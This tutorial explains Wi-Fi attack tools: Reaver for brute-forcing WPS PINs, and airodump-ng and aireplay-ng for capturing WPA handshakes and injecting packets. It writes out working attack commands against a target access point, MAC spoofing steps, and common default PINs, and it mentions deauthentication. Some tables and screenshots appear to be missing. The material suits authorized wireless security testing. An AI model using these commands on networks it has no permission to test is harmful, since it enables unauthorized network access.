Reaver WPS Hacking Tutorial Explained

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually ‘mon0′, not ‘wlan0′, although this will vary based on your wireless card/drivers):# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding ‘-d 0′ on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is –dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the –mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69
Default Pins
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Errors and Warnings
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
Does the target AP support WPS and is WPS enabled?
Did you put your wireless card into monitor mode?
Did you specify the monitor mode interface with the -i option?
Do you have a good signal from the AP?
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
Linux distro, distro version, and architecture (32 bit or 64bit?)
Wireless card and driver
Pcap file demonstrating the issue, if possible

Airodump-ng Explained in Detail.

Airodump-ng Usage
Airodump-ng has the following usage:
airodump-ng <options><interface name>
Airodump-ng has many different options and we will be covering aa great many of them through this tutorial. Some of the most common options are:



Prior to running Airodump-ng, your wireless card needs to be in monitor mode. Then, to run a basic sniffing session, the only parameter that neesd to be passed is the wireless interface name.
airodump-ng <inteface name>
Once Airodump-ng is launched, you will see somthing similar to this:

This may be confusing  but it is really easy to understand.
Airodump-ng breakdown:
As you have seen, Airodump-ng presents a wealth of information while it is running its
capture. The top line of the display, beginning at the left, shows the current channel,
followed by the elapsed sniffing time, the current date and time, and interestingly, an
indication that a WPA handshake was captured. The significance of this will be covered
later but what this means is that a 4-way WPA handshake was captured for the access point
with the BSSID of C8:BC:C8:FE:D9:65.
The Airodump output is separated into 2 separate sections. The top portion provides
information about the access points that have been detected along with the encryption in
use, network names, etc.
In the lower portion of the output, the BSSID column contains the MAC addresses of the
detected access points with the STATION column containing the MAC addresses of the
connected clients.
The table below contains descriptions of all of the Airodump fields.



If you are in an area with many other access points, your Airodump display and capture
files will become very cluttered with unwanted data. After doing your initial
reconnaissance, you can determine the BSSID of the access point and the channel it’s
transmitting on and zero in on it specifically.
To sniff the data of an AP on channel 3 with the BSSID of 34:08:04:09:3D:38, you would
first place your card in monitor mode on channel 3.



Now, you can launch Airodump-ng with some advanced filtering options to sniff only the
traffic for the AP you are interested in by using the following syntax:
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture><interface name>


As can be seen in the above Airodump output, filtering for a specific access point can make
for a much more manageable display and will keep your capture files to a reasonable size.
To further minimize the disk space used by the file capture, you can also include the ‘–
ivs’ option.
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture> –ivs <interface name>
This flag stores only the weak initialization vectors and not the full packet. An important
point to keep in mind is that the ‘–ivs’ flag should NOT be used if you are attempting to
capture a WPA/WPA2 handshake or if you want to use the PTW attack against WEP.
No APs or Clients are Shown
• If you have a laptop with a built-in wireless card, ensure it is enabled in the BIOS.
• Make sure your card works in managed mode.
• Try unloading the driver with rmmod and reloading it with modprobe.
Little or No Data Being Captured
• Ensure that you have used the -c or –channel option to specify a single channel.
Otherwise, Airodump-ng will hop between the different channels.
• You might need to be physically closer to the AP to get a good quality signal.
• Ensure that you have started your wireless card in monitor mode with Airmon-ng.
• If you are using a Madwifi-ng driver, make sure that there are no other VAPs
running. There can be issues when creating a new VAP in monitor mode if there is an existing VAP in managed mode.

Aireplay-ng Explained in detail

Aireplay-ng is primarily used to generate or accelerate wireless traffic for the later use with
Aircrack-ng to crack WEP and WPA-PSK keys.
Aireplay-ng supports various attacks such as
deauthentication (for the purpose of capturing the 4-way WPA handshake), fake
authentication, interactive packet replay, and more.
Aireplay-ng supports the following attacks along with their
corresponding numbers:

This section provides a general usage overview as not all options apply to all attacks. See
the command options of the specific attack you wish to use for the relevant details.
aireplay-ng <options><interface name>
For all attacks, with the exception of deauthentication and fake authentication, you may use
the following filters to limit the packets that will be used in the attack. The most commonly
used filter option is ‘-b’ to single out a specific AP.

When replaying (injecting) packets, the following options apply. Bear in mind that not
every option is relevant for every attack. The specific attack documentation provides
examples of the relevant options.

The Aireplay-ng attacks can obtain packets from two sources. The first source is a live flow
of packets from your wireless card whereas the second source is from a pre-captured pcap
file. The standard pcap format (http://www.tcpdump.org) is recognized by most
commercial and open-source traffic capture and analysis tools. Reading from a file is an
often-overlooked feature of Aireplay-ng.

The following attack modes are specified with the following switches. Numbers can be used
instead of the attack names.


The following troubleshooting tips apply to all modes of Aireplay-ng.
Aireplay-ng does not Inject Packets
Ensure that you are using the correct monitor mode interface. Running ‘iwconfig’ will
show the wireless interfaces and their states. For devices using mac80211 drivers, the
monitor mode interface is typically named mon0. For users of madwifi-ng drivers, ensure
that there are no other VAPs running.
Aireplay-ng Hangs with No Output
If you enter the command and it appears to hang with no output, this is typically due to
your wireless card being on a different channel number than the access point.
Also, if you have another instance of Aireplay-ng running in background mode, this can
cause the second command to hang if the options conflict.
Aireplay-ng “write failed: Cannot allocate memory wi_write(): illegal seek”
When using a wireless card with a Broadcom chipset, you may encounter this bug found in
the original bcm43xx patch. You can try using the b43 driver instead of bcm43xx.
Aireplay-ng has Slow Injection “rtc: lost some interrupts at 1024Hz”
If you see that you are injecting packets successfully but very slowly, at around 30 packets
per second, and receive the kernel message “rtc: lost some interrupts at 1024Hz”, there is
no fix other than to start another instance of Aireplay, which should increase the injection
rate.

Injection Test Usage
The injection test has the following usage:
aireplay-ng -9 -e <ESSID> -a <AP MAC> -i <interface><interface name>
Where:
• -9: injection test
• -e: optional ESSID (network name)
• -a: optional AP MAC address
• -i: optional interface name for the two card injection test
• <interface name>: the interface name to use for the test
Important: You must set your card to the desired channel with Airmon-ng prior to running
any of the tests.
The basic injection test determines if your card successfully supports injection. As
mentioned earlier, the wireless card must first be in monitor mode:

Next, the basic injection test is launched using the following syntax:
aireplay-ng -9 <interface name>

Injection Test Results Analysis
• 12:02:10 Injection is working!:
This confirms that the wireless card can inject
• 12:02:11 Found 2 APs:
These APs were found either through the broadcast probes
or received beacons
12:02:12 34:08:04:09:3D:38 – channel: 3 – ‘em3rgency’: The first AP being tested
12:02:13 Ping (min/avg/max): 1.455ms/4.163ms/12.006ms Power: -37.63: the ping times are calculated
12:02:13 30/30: 100%: The pings had a 100% success rate for the AP
12:02:13 C8:BC:C8:FE:D9:65 – channel: 2 – ‘secnet’: Notice that this AP is on channel 2.